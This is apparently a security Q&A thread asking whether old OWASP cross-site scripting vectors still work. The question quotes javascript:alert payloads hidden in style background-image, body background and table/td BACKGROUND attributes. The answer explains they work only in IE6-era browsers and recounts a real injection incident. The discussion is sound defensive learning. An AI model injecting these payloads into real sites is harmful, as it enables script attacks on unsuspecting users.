# XSS with style attribute background-image

Tags: xss

I've tried to verify some vectors from OWASP XSS CheatSheet which exploits style attributes

STYLE tag using background-image

```
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
STYLE tag using background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
TABLE

<TABLE BACKGROUND="javascript:alert('XSS')">
TD
Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
```

But none of them seem to be working in the latest browsers - IE10, IE11, Chrome, Firefox, Safari.

Are they valid XSS vectors?

Answer (score 7, accepted):

[OWASP's XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Deprecated_Tests_.28Works_on_IE_6_and_older_browsers.29) clearly states that the cases you mention are for old browsers

> Deprecated Tests (Works on IE 6 and older browsers)
>
> These are the tests that have only been confirmed to work on IE 6
>   unless specified otherwise and do not work on any modern browsers as
>   of March 12th, 2014.

Remember, though, not all of your users use up-to-date browsers.

One example is the `<img src="javascript:alert('xss')" />` attack. I never thought I'd worry about it until one of our clients reported that whenever he tried to access one order's page on their inventory system, he'd get redirected to a pornographic website. I found the offending row in the database, but was never able to reproduce the redirect until I learned that he used IE6.

Comment: Ha! Yeah right, "the browser took me here boss". The perfect alibi.

Comment: The OWASP XSS FIlter Evasion Cheat Sheet no longer states this